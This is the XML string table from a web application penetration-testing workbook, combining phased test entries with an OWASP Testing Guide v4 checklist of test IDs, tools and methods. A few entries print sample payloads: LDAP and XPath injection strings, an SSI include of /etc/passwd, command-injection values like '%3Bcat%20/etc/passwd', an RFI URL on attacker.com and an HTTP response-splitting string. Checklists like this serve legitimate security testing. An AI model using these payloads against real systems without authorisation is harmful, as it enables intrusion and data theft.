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abdullah\Documents\"/>
    </mc:Choice>
  </mc:AlternateContent>
  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{4BF0A9F8-28CD-4359-BE29-E4C051B3D988}" xr6:coauthVersionLast="47" xr6:coauthVersionMax="47" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
  <bookViews>
    <workbookView xWindow="28680" yWindow="-120" windowWidth="29040" windowHeight="15720" xr2:uid="{635F79B0-30CF-4561-9CF5-BC2FD905F47B}"/>
  </bookViews>
  <sheets>
    <sheet name="Phase 1" sheetId="9" r:id="rId1"/>
    <sheet name="Phase2" sheetId="10" r:id="rId2"/>
    <sheet name="Phase 3" sheetId="12" r:id="rId3"/>
    <sheet name="phase 4" sheetId="13" r:id="rId4"/>
    <sheet name="Phase 5" sheetId="1" r:id="rId5"/>
    <sheet name="Phase 6" sheetId="2" r:id="rId6"/>
    <sheet name="Phase 7" sheetId="3" r:id="rId7"/>
    <sheet name="Phase 8" sheetId="4" r:id="rId8"/>
    <sheet name="Phase 9" sheetId="5" r:id="rId9"/>
    <sheet name="Phase 10" sheetId="6" r:id="rId10"/>
    <sheet name="Phase 11" sheetId="7" r:id="rId11"/>
    <sheet name="Phase 12" sheetId="8" r:id="rId12"/>
    <sheet name="reffernce" sheetId="11" r:id="rId1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<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="1448" uniqueCount="1116">
  <si>
    <t>Test ID</t>
  </si>
  <si>
    <t>Test Name</t>
  </si>
  <si>
    <t>Objective</t>
  </si>
  <si>
    <t>Tools</t>
  </si>
  <si>
    <t>Methodology Summary</t>
  </si>
  <si>
    <t>Pass/Fail Criteria</t>
  </si>
  <si>
    <t>Status</t>
  </si>
  <si>
    <t>Notes</t>
  </si>
  <si>
    <t>Burp Suite</t>
  </si>
  <si>
    <t>Burp Suite, Browser Dev Tools</t>
  </si>
  <si>
    <t>Burp Suite, Wireshark</t>
  </si>
  <si>
    <t>Burp Suite (HTTP Request Smuggler extension)</t>
  </si>
  <si>
    <t>WSTG-ERRH-01</t>
  </si>
  <si>
    <t>Test for Improper Error Handling and Stack Traces</t>
  </si>
  <si>
    <t>To deliberately cause errors to see if the application leaks sensitive information like file paths, software versions, or internal variable names.</t>
  </si>
  <si>
    <t>1. Identify a parameter that expects a specific data type (e.g., a number). 
2. Tamper with the parameter by providing an unexpected data type (e.g., a string, a very large number) or by removing it entirely. 
3. Send the malformed request and inspect the response for detailed error messages.</t>
  </si>
  <si>
    <t>Pass: The application catches the exception and presents a generic, user-friendly error page with no technical details. 
Fail: The application crashes and returns a verbose error message, including a full stack trace, file paths, or software versions.</t>
  </si>
  <si>
    <t>Test Integrity Checks</t>
  </si>
  <si>
    <t>Burp Suite (Turbo Intruder)</t>
  </si>
  <si>
    <t>Browser Dev Tools</t>
  </si>
  <si>
    <t>Burp Suite (Param Miner)</t>
  </si>
  <si>
    <t>TOPIC-001</t>
  </si>
  <si>
    <t>Conduct Search Engine Discovery and Reconnaissance for Information Leakage</t>
  </si>
  <si>
    <t>Identify sensitive files or directories indexed by search engines that could expose internal information.</t>
  </si>
  <si>
    <t>Google Dorking, Shodan, FOCA</t>
  </si>
  <si>
    <t>TOPIC-002</t>
  </si>
  <si>
    <t>Fingerprint Web Server</t>
  </si>
  <si>
    <t>Determine the web server software and version to identify potential vulnerabilities.</t>
  </si>
  <si>
    <t>Nmap, WhatWeb, Wappalyzer</t>
  </si>
  <si>
    <t>TOPIC-003</t>
  </si>
  <si>
    <t>Review Webserver Metafiles for Information Leakage</t>
  </si>
  <si>
    <t>Examine metadata and configuration files for information leakage that could reveal sensitive paths or internal systems.</t>
  </si>
  <si>
    <t>Browser, Curl, Wget</t>
  </si>
  <si>
    <t>TOPIC-004</t>
  </si>
  <si>
    <t>Enumerate Applications on Webserver</t>
  </si>
  <si>
    <t>Identify all hosted web applications and their locations to expand the attack surface.</t>
  </si>
  <si>
    <t>Nmap, Dirsearch, Sublist3r</t>
  </si>
  <si>
    <t>1. Scan for virtual hosts and subdomains. 2. Enumerate directories and applications using brute-force wordlists. 3. Confirm findings manually through browser access.</t>
  </si>
  <si>
    <t>TOPIC-005</t>
  </si>
  <si>
    <t>Review Webpage Comments and Metadata for Information Leakage</t>
  </si>
  <si>
    <t>Inspect client-side code for developer comments, API keys, or credentials that could lead to exploitation.</t>
  </si>
  <si>
    <t>Browser Developer Tools, Wget, Grep</t>
  </si>
  <si>
    <t>1. View page source and scripts. 2. Search for keywords like “password”, “api_key”, or “debug”. 3. Verify any discovered information.</t>
  </si>
  <si>
    <t>TOPIC-006</t>
  </si>
  <si>
    <t>Identify Application Entry Points</t>
  </si>
  <si>
    <t>Map all user input points where data enters the application.</t>
  </si>
  <si>
    <t>Burp Suite, OWASP ZAP</t>
  </si>
  <si>
    <t>1. Intercept and crawl traffic using a proxy. 2. Record all parameters, forms, and APIs. 3. Build a list of endpoints accepting user input.</t>
  </si>
  <si>
    <t>TOPIC-007</t>
  </si>
  <si>
    <t>Map Execution Paths through Application</t>
  </si>
  <si>
    <t>Understand how data and user requests flow through the application.</t>
  </si>
  <si>
    <t>Burp Suite, Browser DevTools</t>
  </si>
  <si>
    <t>1. Navigate through all user journeys. 2. Track dependencies between pages and parameters. 3. Identify logical flow and access control points.</t>
  </si>
  <si>
    <t>TOPIC-008</t>
  </si>
  <si>
    <t>Test for Web Application Fingerprinting</t>
  </si>
  <si>
    <t>Detect technologies, frameworks, and CMS used by the application for version-based vulnerability research.</t>
  </si>
  <si>
    <t>WhatWeb, Wappalyzer, BuiltWith</t>
  </si>
  <si>
    <t>1. Scan the target for technology fingerprints. 2. Analyze response headers, cookies, and HTML tags. 3. Record framework versions for CVE review.</t>
  </si>
  <si>
    <t>TOPIC-009</t>
  </si>
  <si>
    <t>Review Web Application Architecture Diagram</t>
  </si>
  <si>
    <t>Analyze the structure of the application to identify interconnections and attack vectors.</t>
  </si>
  <si>
    <t>Draw.io, Lucidchart, Manual Review</t>
  </si>
  <si>
    <t>1. Gather architectural details from documentation or reconnaissance. 2. Map data flow and trust boundaries. 3. Highlight critical communication links.</t>
  </si>
  <si>
    <t>TOPIC-010</t>
  </si>
  <si>
    <t>Analyze Security Headers</t>
  </si>
  <si>
    <t>Verify implementation of security-related HTTP headers to mitigate attacks like XSS and Clickjacking.</t>
  </si>
  <si>
    <t>Curl, Browser DevTools, SecurityHeaders.io</t>
  </si>
  <si>
    <t>TOPIC-011</t>
  </si>
  <si>
    <t>Fingerprint Web Application</t>
  </si>
  <si>
    <t>Identify frameworks, CMS, and third-party components to evaluate known vulnerabilities.</t>
  </si>
  <si>
    <t>WhatWeb, Wappalyzer, Burp Suite</t>
  </si>
  <si>
    <t>1. Analyze web responses and HTML content. 2. Detect framework or plugin references. 3. Cross-reference with known CVEs.</t>
  </si>
  <si>
    <t>TOPIC-012</t>
  </si>
  <si>
    <t>Map Application Architecture</t>
  </si>
  <si>
    <t>Build a complete overview of the application’s backend components and network layers.</t>
  </si>
  <si>
    <t>Nmap, Burp Suite, Browser DevTools</t>
  </si>
  <si>
    <t>1. Inspect headers for server/proxy indicators. 2. Conduct port and service scanning. 3. Create a logical architecture diagram.</t>
  </si>
  <si>
    <t>TOPIC-013</t>
  </si>
  <si>
    <t>Review Web Server Metafiles (Extended)</t>
  </si>
  <si>
    <t>Check search engine and utility files for sensitive disclosures (e.g., robots.txt, sitemap.xml).</t>
  </si>
  <si>
    <t>Curl, Wget, Browser</t>
  </si>
  <si>
    <t>TOPIC-014</t>
  </si>
  <si>
    <t>Discover Hidden Content and Directories</t>
  </si>
  <si>
    <t>Identify unlinked directories, configuration files, and backup data accessible via the web server.</t>
  </si>
  <si>
    <t>Gobuster, Feroxbuster, Dirb</t>
  </si>
  <si>
    <t>1. Perform directory brute-forcing with wordlists. 2. Analyze HTTP responses for valid paths. 3. Investigate high-value directories manually.</t>
  </si>
  <si>
    <t>TOPIC-015</t>
  </si>
  <si>
    <t>Conduct Search Engine Discovery (Updated Google Dorking Methods)</t>
  </si>
  <si>
    <t>Use advanced search queries to find indexed sensitive resources related to the target.</t>
  </si>
  <si>
    <t>Google, Bing, Shodan</t>
  </si>
  <si>
    <t>OWASP: Testing Guide v4 Checklist</t>
  </si>
  <si>
    <t>Information Gathering</t>
  </si>
  <si>
    <t>Description</t>
  </si>
  <si>
    <t>Result</t>
  </si>
  <si>
    <t>Remark</t>
  </si>
  <si>
    <t>OTG-INFO-001</t>
  </si>
  <si>
    <t>Use a search engine to search for Network diagrams and Configurations, Credentials, Error message content.</t>
  </si>
  <si>
    <t>Google Hacking, Sitedigger, Shodan, FOCA, Punkspider</t>
  </si>
  <si>
    <t>Not Started</t>
  </si>
  <si>
    <t>OTG-INFO-002</t>
  </si>
  <si>
    <t>Find the version and type of a running web server to determine known vulnerabilities and the appropriate exploits. Using
"HTTP header field ordering" and "Malformed requests test".</t>
  </si>
  <si>
    <t>Httprint, Httprecon, Desenmascarame</t>
  </si>
  <si>
    <t>OTG-INFO-003</t>
  </si>
  <si>
    <t>Analyze robots.txt and identify &lt;META&gt; Tags from website.</t>
  </si>
  <si>
    <t>Browser, curl, wget</t>
  </si>
  <si>
    <t>OTG-INFO-004</t>
  </si>
  <si>
    <t>Find applications hosted in the webserver (Virtual hosts/Subdomain), non-standard ports, DNS zone transfers</t>
  </si>
  <si>
    <t>Webhosting.info, dnsrecon, Nmap, fierce, Recon-ng, Intrigue</t>
  </si>
  <si>
    <t>OTG-INFO-005</t>
  </si>
  <si>
    <t>Find sensitive information from webpage comments and Metadata on source code.</t>
  </si>
  <si>
    <t>OTG-INFO-006</t>
  </si>
  <si>
    <t>Identify application entry points</t>
  </si>
  <si>
    <t>Identify from hidden fields, parameters, methods HTTP header analysis</t>
  </si>
  <si>
    <t>Burp proxy, ZAP, Tamper data</t>
  </si>
  <si>
    <t>OTG-INFO-007</t>
  </si>
  <si>
    <t>Map execution paths through application</t>
  </si>
  <si>
    <t>Map the target application and understand the principal workflows.</t>
  </si>
  <si>
    <t>Burp proxy, ZAP</t>
  </si>
  <si>
    <t>OTG-INFO-008</t>
  </si>
  <si>
    <t>Fingerprint Web Application Framework</t>
  </si>
  <si>
    <t>Find the type of web application framework/CMS from HTTP headers, Cookies, Source code, Specific files and folders.</t>
  </si>
  <si>
    <t>Whatweb, BlindElephant, Wappalyzer</t>
  </si>
  <si>
    <t>OTG-INFO-009</t>
  </si>
  <si>
    <t>Identify the web application and version to determine known vulnerabilities and the appropriate exploits.</t>
  </si>
  <si>
    <t>Whatweb, BlindElephant, Wappalyzer, CMSmap</t>
  </si>
  <si>
    <t>OTG-INFO-010</t>
  </si>
  <si>
    <t>Identify application architecture including Web language, WAF, Reverse proxy, Application Server, Backend Database</t>
  </si>
  <si>
    <t>Configuration and Deploy Management Testing</t>
  </si>
  <si>
    <t>OTG-CONFIG-001</t>
  </si>
  <si>
    <t>Test Network/Infrastructure Configuration</t>
  </si>
  <si>
    <t>Understand the infrastructure elements interactions, config management for software, backend DB server, WebDAV, FTP in order to identify known vulnerabilities.</t>
  </si>
  <si>
    <t>Nessus</t>
  </si>
  <si>
    <t>OTG-CONFIG-002</t>
  </si>
  <si>
    <t>Test Application Platform Configuration</t>
  </si>
  <si>
    <t>Identify default installation file/directory, Handle Server errors (40*,50*), Minimal Privilege, Software logging.</t>
  </si>
  <si>
    <t>Browser, Nikto</t>
  </si>
  <si>
    <t>OTG-CONFIG-003</t>
  </si>
  <si>
    <t>Test File Extensions Handling for Sensitive Information</t>
  </si>
  <si>
    <t>Find important file, information (.asa , .inc , .sql ,zip, tar, pdf, txt, etc)</t>
  </si>
  <si>
    <t>OTG-CONFIG-004</t>
  </si>
  <si>
    <t>Backup and Unreferenced Files for Sensitive Information</t>
  </si>
  <si>
    <t>Check JS source code, comments, cache file, backup file (.old, .bak, .inc, .src) and guessing of filename</t>
  </si>
  <si>
    <t>Nessus, Nikto, Wikto</t>
  </si>
  <si>
    <t>OTG-CONFIG-005</t>
  </si>
  <si>
    <t>Enumerate Infrastructure and Application Admin Interfaces</t>
  </si>
  <si>
    <t>Directory and file enumeration, comments and links in source (/admin, /administrator, /backoffice, /backend, etc), alternative server port (Tomcat/8080)</t>
  </si>
  <si>
    <t>Burp Proxy, dirb, Dirbuster, fuzzdb, Tilde Scanner</t>
  </si>
  <si>
    <t>OTG-CONFIG-006</t>
  </si>
  <si>
    <t>Test HTTP Methods</t>
  </si>
  <si>
    <t>Identify HTTP allowed methods on Web server with OPTIONS. Arbitrary HTTP Methods, HEAD access control bypass and XST</t>
  </si>
  <si>
    <t>netcat, curl</t>
  </si>
  <si>
    <t>OTG-CONFIG-007</t>
  </si>
  <si>
    <t>Test HTTP Strict Transport Security</t>
  </si>
  <si>
    <t>Identify HSTS header on Web server through HTTP response header. 
curl -s -D- https://domain.com/ | grep Strict</t>
  </si>
  <si>
    <t>Burp Proxy, ZAP, curl</t>
  </si>
  <si>
    <t>OTG-CONFIG-008</t>
  </si>
  <si>
    <t>Test RIA cross domain policy</t>
  </si>
  <si>
    <t>Analyse the permissions allowed from the policy files (crossdomain.xml/clientaccesspolicy.xml) and allow-access-from.</t>
  </si>
  <si>
    <t>Burp Proxy, ZAP, Nikto</t>
  </si>
  <si>
    <t>Identity Management Testing</t>
  </si>
  <si>
    <t>OTG-IDENT-001</t>
  </si>
  <si>
    <t>Test Role Definitions</t>
  </si>
  <si>
    <t>Validate the system roles defined within the application by creating permission matrix.</t>
  </si>
  <si>
    <t>Burp Proxy, ZAP</t>
  </si>
  <si>
    <t>OTG-IDENT-002</t>
  </si>
  <si>
    <t>Test User Registration Process</t>
  </si>
  <si>
    <t>Verify that the identity requirements for user registration are aligned
with business and security requirements:</t>
  </si>
  <si>
    <t>OTG-IDENT-003</t>
  </si>
  <si>
    <t>Test Account Provisioning Process</t>
  </si>
  <si>
    <t>Determine which roles are able to provision users and what sort of
accounts they can provision.</t>
  </si>
  <si>
    <t>OTG-IDENT-004</t>
  </si>
  <si>
    <t>Testing for Account Enumeration and Guessable User Account</t>
  </si>
  <si>
    <t>Generic login error statement check, return codes/parameter values, enumerate all possible valid userids (Login system, Forgot password)</t>
  </si>
  <si>
    <t>Browser, Burp Proxy, ZAP</t>
  </si>
  <si>
    <t>OTG-IDENT-005</t>
  </si>
  <si>
    <t>Testing for Weak or unenforced username policy</t>
  </si>
  <si>
    <t>User account names are often highly structured (e.g. Joe Bloggs
account name is jbloggs and Fred Nurks account name is fnurks)
and valid account names can easily be guessed.</t>
  </si>
  <si>
    <t>OTG-IDENT-006</t>
  </si>
  <si>
    <t>Test Permissions of Guest/Training Accounts</t>
  </si>
  <si>
    <t>Guest and Training accounts are useful ways to acquaint potential users with system functionality prior to them completing the authorisation process required for access.Evaluate consistency between access policy and guest/training account access permissions.</t>
  </si>
  <si>
    <t>OTG-IDENT-007</t>
  </si>
  <si>
    <t>Test Account Suspension/Resumption Process</t>
  </si>
  <si>
    <t>Verify the identity requirements for user registration align with business/security requirements. Validate the registration process.</t>
  </si>
  <si>
    <t>Authentication Testing</t>
  </si>
  <si>
    <t>OTG-AUTHN-001</t>
  </si>
  <si>
    <t>Testing for Credentials Transported over an Encrypted Channel</t>
  </si>
  <si>
    <t>Check referrer whether its HTTP or HTTPs. Sending data through HTTP and HTTPS.</t>
  </si>
  <si>
    <t>OTG-AUTHN-002</t>
  </si>
  <si>
    <t>Testing for default credentials</t>
  </si>
  <si>
    <t>Testing for default credentials of common applications, Testing for default password of new accounts.</t>
  </si>
  <si>
    <t>Burp Proxy, ZAP, Hydra</t>
  </si>
  <si>
    <t>OTG-AUTHN-003</t>
  </si>
  <si>
    <t>Testing for Weak lock out mechanism</t>
  </si>
  <si>
    <t>Evaluate the account lockout mechanism’s ability to mitigate
brute force password guessing. Evaluate the unlock mechanism’s resistance to unauthorized account unlocking.</t>
  </si>
  <si>
    <t>Browser</t>
  </si>
  <si>
    <t>OTG-AUTHN-004</t>
  </si>
  <si>
    <t>Testing for bypassing authentication schema</t>
  </si>
  <si>
    <t>Force browsing (/admin/main.php, /page.asp?authenticated=yes), Parameter Modification, Session ID prediction, SQL Injection</t>
  </si>
  <si>
    <t>OTG-AUTHN-005</t>
  </si>
  <si>
    <t>Test remember password functionality</t>
  </si>
  <si>
    <t>Look for passwords being stored in a cookie. Examine the cookies stored by the application. Verify that the credentials are not stored in clear text, but are hashed. Autocompleted=off?</t>
  </si>
  <si>
    <t>OTG-AUTHN-006</t>
  </si>
  <si>
    <t>Testing for Browser cache weakness</t>
  </si>
  <si>
    <t>Check browser history issue by clicking "Back" button after logging out. Check browser cache issue from HTTP response headers (Cache-Control: no-cache)</t>
  </si>
  <si>
    <t>Burp Proxy, ZAP, Firefox add-on CacheViewer2</t>
  </si>
  <si>
    <t>OTG-AUTHN-007</t>
  </si>
  <si>
    <t>Testing for Weak password policy</t>
  </si>
  <si>
    <t>Determine the resistance of the application against brute force
password guessing using available password dictionaries by evaluating the length, complexity, reuse and aging requirements of
passwords.</t>
  </si>
  <si>
    <t>OTG-AUTHN-008</t>
  </si>
  <si>
    <t>Testing for Weak security question/answer</t>
  </si>
  <si>
    <t>Testing for weak pre-generated questions, Testing for weak self-generated question, Testing for brute-forcible answers (Unlimited attempts?)</t>
  </si>
  <si>
    <t>OTG-AUTHN-009</t>
  </si>
  <si>
    <t>Testing for weak password change or reset functionalities</t>
  </si>
  <si>
    <t>Test password reset (Display old password in plain-text?, Send via email?, Random token on confirmation email ?), Test password change (Need old password?), CSRF vulnerability ?</t>
  </si>
  <si>
    <t>OTG-AUTHN-010</t>
  </si>
  <si>
    <t>Testing for Weaker authentication in alternative channel</t>
  </si>
  <si>
    <t>Understand the primary mechanism and Identify other channels (Mobile App, Call center, SSO)</t>
  </si>
  <si>
    <t xml:space="preserve">Authorization Testing </t>
  </si>
  <si>
    <t>OTG-AUTHZ-001</t>
  </si>
  <si>
    <t>Testing Directory traversal/file include</t>
  </si>
  <si>
    <t>dot-dot-slash attack (../), Directory traversal, Local File inclusion/Remote File Inclusion.</t>
  </si>
  <si>
    <t>Burp Proxy, ZAP, Wfuzz</t>
  </si>
  <si>
    <t>OTG-AUTHZ-002</t>
  </si>
  <si>
    <t>Testing for bypassing authorization schema</t>
  </si>
  <si>
    <t>Access a resource without authentication?, Bypass ACL, Force browsing (/admin/adduser.jsp)</t>
  </si>
  <si>
    <t>Burp Proxy (Autorize), ZAP</t>
  </si>
  <si>
    <t>OTG-AUTHZ-003</t>
  </si>
  <si>
    <t>Testing for Privilege Escalation</t>
  </si>
  <si>
    <t>Testing for role/privilege manipulate the values of hidden variables. Change some param groupid=2 to groupid=1</t>
  </si>
  <si>
    <t>OTG-AUTHZ-004</t>
  </si>
  <si>
    <t>Testing for Insecure Direct Object References</t>
  </si>
  <si>
    <t>Force changing parameter value (?invoice=123 -&gt; ?invoice=456)</t>
  </si>
  <si>
    <t>Session Management Testing</t>
  </si>
  <si>
    <t>OTG-SESS-001</t>
  </si>
  <si>
    <t>Testing for Bypassing Session Management Schema</t>
  </si>
  <si>
    <t>SessionID analysis prediction, unencrypted cookie transport, brute-force.</t>
  </si>
  <si>
    <t>Burp Proxy, ForceSSL, ZAP, CookieDigger</t>
  </si>
  <si>
    <t>OTG-SESS-002</t>
  </si>
  <si>
    <t>Testing for Cookies attributes</t>
  </si>
  <si>
    <t>Check HTTPOnly and Secure flag, expiration, inspect for sensitive data.</t>
  </si>
  <si>
    <t>OTG-SESS-003</t>
  </si>
  <si>
    <t>Testing for Session Fixation</t>
  </si>
  <si>
    <t>The application doesn't renew the cookie after a successfully user authentication.</t>
  </si>
  <si>
    <t>OTG-SESS-004</t>
  </si>
  <si>
    <t>Testing for Exposed Session Variables</t>
  </si>
  <si>
    <t>Encryption &amp; Reuse of session Tokens vulnerabilities, Send sessionID with GET method ?</t>
  </si>
  <si>
    <t>OTG-SESS-005</t>
  </si>
  <si>
    <t>Testing for Cross Site Request Forgery</t>
  </si>
  <si>
    <t>URL analysis, Direct access to functions without any token.</t>
  </si>
  <si>
    <t>Burp Proxy (csrf_token_detect), burpy, ZAP</t>
  </si>
  <si>
    <t>OTG-SESS-006</t>
  </si>
  <si>
    <t>Testing for logout functionality</t>
  </si>
  <si>
    <t>Check reuse session after logout both server-side and SSO.</t>
  </si>
  <si>
    <t>OTG-SESS-007</t>
  </si>
  <si>
    <t>Test Session Timeout</t>
  </si>
  <si>
    <t>Check session timeout, after the timeout has passed, all session tokens should be destroyed or be unusable.</t>
  </si>
  <si>
    <t>OTG-SESS-008</t>
  </si>
  <si>
    <t>Testing for Session puzzling</t>
  </si>
  <si>
    <t>The application uses the same session variable for more than one purpose. An attacker can potentially access pages in an order unanticipated by the developers so that the session variable is set in one context and then used in another.</t>
  </si>
  <si>
    <t>Data Validation Testing</t>
  </si>
  <si>
    <t>OTG-INPVAL-001</t>
  </si>
  <si>
    <t>Testing for Reflected Cross Site Scripting</t>
  </si>
  <si>
    <t>Check for input validation, Replace the vector used to identify XSS, XSS with HTTP Parameter Pollution.</t>
  </si>
  <si>
    <t>Burp Proxy, ZAP, Xenotix XSS</t>
  </si>
  <si>
    <t>OTG-INPVAL-002</t>
  </si>
  <si>
    <t>Testing for Stored Cross Site Scripting</t>
  </si>
  <si>
    <t>Check input forms/Upload forms and analyze HTML codes, Leverage XSS with BeEF</t>
  </si>
  <si>
    <t>Burp Proxy, ZAP, BeEF, XSS Proxy</t>
  </si>
  <si>
    <t>OTG-INPVAL-003</t>
  </si>
  <si>
    <t>Testing for HTTP Verb Tampering</t>
  </si>
  <si>
    <t>Craft custom HTTP requests to test the other methods to bypass URL authentication and authorization.</t>
  </si>
  <si>
    <t>netcat</t>
  </si>
  <si>
    <t>OTG-INPVAL-004</t>
  </si>
  <si>
    <t>Testing for HTTP Parameter pollution</t>
  </si>
  <si>
    <t>Identify any form or action that allows user-supplied input to bypass Input validation and filters using HPP</t>
  </si>
  <si>
    <t>ZAP, HPP Finder (Chrome Plugin)</t>
  </si>
  <si>
    <t>OTG-INPVAL-005</t>
  </si>
  <si>
    <t>Testing for SQL Injection</t>
  </si>
  <si>
    <t>Union, Boolean, Error based, Out-of-band, Time delay.</t>
  </si>
  <si>
    <t>Burp Proxy (SQLipy), SQLMap, Pangolin, Seclists (FuzzDB)</t>
  </si>
  <si>
    <t>Oracle Testing</t>
  </si>
  <si>
    <t>Identify URLs for PL/SQL web applications, Access with PL/SQL Packages, Bypass PL/SQL Exclusion list, SQL Injection</t>
  </si>
  <si>
    <t>Orascan, SQLInjector</t>
  </si>
  <si>
    <t>MySQL Testing</t>
  </si>
  <si>
    <t>Identify MySQL version, Single quote, Information_schema, Read/Write file.</t>
  </si>
  <si>
    <t>SQLMap, Mysqloit, Power Injector</t>
  </si>
  <si>
    <t>SQL Server Testing</t>
  </si>
  <si>
    <t>Comment operator (- -), Query separator (;), Stored procedures (xp_cmdshell)</t>
  </si>
  <si>
    <t>SQLMap, SQLninja, Power Injector</t>
  </si>
  <si>
    <t>Testing PostgreSQL</t>
  </si>
  <si>
    <t>Determine that the backend database engine is PostgreSQL by using the :: cast operator. Read/Write file, Shell Injection (OS command)</t>
  </si>
  <si>
    <t>SQLMap</t>
  </si>
  <si>
    <t>MS Access Testing</t>
  </si>
  <si>
    <t>Enumerate the column through error-based (Group by), Obtain database schema combine with fuzzdb.</t>
  </si>
  <si>
    <t>Testing for NoSQL injection</t>
  </si>
  <si>
    <t>Identify NoSQL databases, Pass special characters (' " \ ; { } ), Attack with reserved variable name, operator.</t>
  </si>
  <si>
    <t>NoSQLMap</t>
  </si>
  <si>
    <t>OTG-INPVAL-006</t>
  </si>
  <si>
    <t>Testing for LDAP Injection</t>
  </si>
  <si>
    <t>/ldapsearch?user=*
user=*user=*)(uid=*))(|(uid=*
pass=password</t>
  </si>
  <si>
    <t>OTG-INPVAL-007</t>
  </si>
  <si>
    <t>Testing for ORM Injection</t>
  </si>
  <si>
    <t>Testing ORM injection is identical to SQL injection testing</t>
  </si>
  <si>
    <t>Hibernate, Nhibernate</t>
  </si>
  <si>
    <t>OTG-INPVAL-008</t>
  </si>
  <si>
    <t>Testing for XML Injection</t>
  </si>
  <si>
    <t>Check with XML Meta Characters
', " , &lt;&gt;, &lt;!--/--&gt;, &amp;, &lt;![CDATA[ / ]]&gt;, XXE, TAG</t>
  </si>
  <si>
    <t>OTG-INPVAL-009</t>
  </si>
  <si>
    <t>Testing for SSI Injection</t>
  </si>
  <si>
    <t>• Presense of .shtml extension
• Check for these characters
&lt; ! # = / . " - &gt; and [a-zA-Z0-9]
• include String = &lt;!--#include virtual="/etc/passwd" --&gt;</t>
  </si>
  <si>
    <t>OTG-INPVAL-010</t>
  </si>
  <si>
    <t>Testing for XPath Injection</t>
  </si>
  <si>
    <t>Check for XML error enumeration by supplying a single quote (')
Username: ‘ or ‘1’ = ‘1
Password: ‘ or ‘1’ = ‘1</t>
  </si>
  <si>
    <t>OTG-INPVAL-011</t>
  </si>
  <si>
    <t>IMAP/SMTP Injection</t>
  </si>
  <si>
    <t>• Identifying vulnerable parameters with special characters
(i.e.: \, ‘, “, @, #, !, |)
• Understanding the data flow and deployment structure of the client
• IMAP/SMTP command injection (Header, Body, Footer)</t>
  </si>
  <si>
    <t>OTG-INPVAL-012</t>
  </si>
  <si>
    <t>Testing for Code Injection</t>
  </si>
  <si>
    <t>Enter OS commands in the input field.
?arg=1; system('id')</t>
  </si>
  <si>
    <t>Burp Proxy, ZAP, Liffy, Panoptic</t>
  </si>
  <si>
    <t>Testing for Local File Inclusion</t>
  </si>
  <si>
    <t>LFI with dot-dot-slash (../../), PHP Wrapper (php://filter/convert.base64-encode/resource)</t>
  </si>
  <si>
    <t>Burp Proxy, fimap, Liffy</t>
  </si>
  <si>
    <t>Testing for Remote File Inclusion</t>
  </si>
  <si>
    <t>RFI from malicious URL
?page.php?file=http://attacker.com/malicious_page</t>
  </si>
  <si>
    <t>OTG-INPVAL-013</t>
  </si>
  <si>
    <t>Testing for Command Injection</t>
  </si>
  <si>
    <t>Understand the application platform, OS, folder structure, relative path and execute OS commands on a Web server.
%3Bcat%20/etc/passwd
test.pdf+|+Dir C:\</t>
  </si>
  <si>
    <t>Burp Proxy, ZAP, Commix</t>
  </si>
  <si>
    <t>OTG-INPVAL-014</t>
  </si>
  <si>
    <t>Testing for Buffer overflow</t>
  </si>
  <si>
    <t>• Testing for heap overflow vulnerability
• Testing for stack overflow vulnerability
• Testing for format string vulnerability</t>
  </si>
  <si>
    <t>Immunity Canvas, Spike, MSF, Nessus</t>
  </si>
  <si>
    <t>Testing for Heap overflow</t>
  </si>
  <si>
    <t>Testing for Stack overflow</t>
  </si>
  <si>
    <t>Testing for Format string</t>
  </si>
  <si>
    <t>OTG-INPVAL-015</t>
  </si>
  <si>
    <t>Testing for incubated vulnerabilities</t>
  </si>
  <si>
    <t>File Upload, Stored XSS , SQL/XPATH Injection, Misconfigured servers (Tomcat, Plesk, Cpanel)</t>
  </si>
  <si>
    <t>Burp Proxy, BeEF, MSF</t>
  </si>
  <si>
    <t>OTG-INPVAL-016</t>
  </si>
  <si>
    <t>Testing for HTTP Splitting/Smuggling</t>
  </si>
  <si>
    <t>param=foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2035%0d%0a%0d%0a&lt;html&gt;Sorry,%20System%20Down&lt;/html&gt;</t>
  </si>
  <si>
    <t>Burp Proxy, ZAP, netcat</t>
  </si>
  <si>
    <t>Error Handling</t>
  </si>
  <si>
    <t>OTG-ERR-001</t>
  </si>
  <si>
    <t>Analysis of Error Codes</t>
  </si>
  <si>
    <t>Locate error codes generated from applications or web servers. Collect sensitive information from that errors (Web Server, Application Server, Database)</t>
  </si>
  <si>
    <t>OTG-ERR-002</t>
  </si>
  <si>
    <t>Analysis of Stack Traces</t>
  </si>
  <si>
    <t>• Invalid Input / Empty inputs
• Input that contains non alphanumeric characters or query syn
tax
• Access to internal pages without authentication
• Bypassing application flow</t>
  </si>
  <si>
    <t>Cryptography</t>
  </si>
  <si>
    <t>OTG-CRYPST-001</t>
  </si>
  <si>
    <t>Testing for Weak SSL/TSL Ciphers, Insufficient Transport Layer Protection</t>
  </si>
  <si>
    <t>Identify SSL service, Idectify weak ciphers/protocols (ie. RC4, BEAST, CRIME, POODLE)</t>
  </si>
  <si>
    <t>testssl.sh, SSL Breacher</t>
  </si>
  <si>
    <t>OTG-CRYPST-002</t>
  </si>
  <si>
    <t>Testing for Padding Oracle</t>
  </si>
  <si>
    <t>Compare the responses in three different states:
• Cipher text gets decrypted, resulting data is correct.
• Cipher text gets decrypted, resulting data is garbled and causes
some exception or error handling in the application logic.
• Cipher text decryption fails due to padding errors.</t>
  </si>
  <si>
    <t>PadBuster, Poracle, python-paddingoracle, POET</t>
  </si>
  <si>
    <t>OTG-CRYPST-003</t>
  </si>
  <si>
    <t>Testing for Sensitive information sent via unencrypted channels</t>
  </si>
  <si>
    <t>Check sensitive data during the transmission:
• Information used in authentication (e.g. Credentials, PINs, Session
identifiers, Tokens, Cookies…)
• Information protected by laws, regulations or specific organizational
policy (e.g. Credit Cards, Customers data)</t>
  </si>
  <si>
    <t>Burp Proxy, ZAP, Curl</t>
  </si>
  <si>
    <t>Business logic Testing</t>
  </si>
  <si>
    <t>OTG-BUSLOGIC-001</t>
  </si>
  <si>
    <t>Test Business Logic Data Validation</t>
  </si>
  <si>
    <t xml:space="preserve">• Looking for data entry points or hand off points between systems or software.
• Once found try to insert logically invalid data into the application/system. </t>
  </si>
  <si>
    <t>OTG-BUSLOGIC-002</t>
  </si>
  <si>
    <t>Test Ability to Forge Requests</t>
  </si>
